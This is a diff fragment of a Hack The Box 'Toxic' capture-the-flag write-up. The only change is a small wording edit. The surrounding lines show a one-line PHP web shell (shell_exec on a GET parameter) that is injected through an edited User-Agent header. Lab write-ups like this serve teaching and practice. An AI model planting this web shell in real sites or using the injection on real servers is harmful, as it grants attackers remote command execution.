Jokepp/writeups/hackthebox/challenges/toxic.md

 <?php echo shell_exec($_GET['cmd']); ?>
 ```

 This will execute any command that is passed to the page via the GET parameter `cmd`.
-We replace the `User-Agent` string using the Firefox developer tools again by right-clicking on the last GET request and choosing _"Edit and Resend"_:
+We replace the `User-Agent` string using the Firefox developer tools once more by right-clicking on the last GET request and choosing _"Edit and Resend"_:

 <p align="center">
    <img src="includes/toxic-03.png" />